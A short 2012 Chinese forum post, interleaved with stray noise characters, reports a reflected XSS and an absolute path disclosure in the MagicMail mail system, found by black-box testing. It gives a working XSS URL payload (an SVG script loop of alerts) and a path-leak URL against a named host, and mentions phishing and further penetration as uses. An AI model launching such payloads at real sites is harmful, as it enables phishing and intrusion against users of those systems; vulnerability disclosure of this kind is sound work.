今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞. D5 G1 D) \. [3 L! @
' e: @+ O+ s6 z7 w' S# c
) f' n( W& H6 O6 g包含 一个反射性XSS 以及 绝对路径泄漏
1 k2 W& x2 k* f, g看了看 貌似全部是linux的。" A: h: X6 L: I
3 g& N% ~3 [* _3 c! w) b8 M( `关键字:迈捷邮件系统 by MagicMail) Q* u& g; n! T: I! k0 f
5 P) k1 s0 v8 {3 |. ~+ Z可以看到很多政府网站都用这个邮件系统
5 Q. E% T" H6 `7 o* G0 N# C) \- ~6 M# ]& p+ Z# z6 t- B
绝对路径 http://madman.in/index.php?login_type=declare&language=
1 B- }# J1 `* Y7 G9 Z! P6 S: Z/ k% O8 w2 L* D1 @8 y% c
! b- x* q- _3 |% t$ O9 O
# V& E! Q9 j/ D: V! n( _" IXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
* \+ v1 y: E. s8 L( F# }2 F* Z) r- C0 h* m. u5 |, ]0 S
8 I' |6 i f+ v0 l3 u0 m' E2 t' J A* z& d
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等5 B: T: q: Q' b3 e1 y3 l7 S; T$ t* \
8 I1 N* y( V" D0 \
修复方案:看官方补丁吧。
( }, Z5 U- ?0 P! ?0 C- q6 k |
发表于 2012-11-9 20:38:41
收藏
支持
反对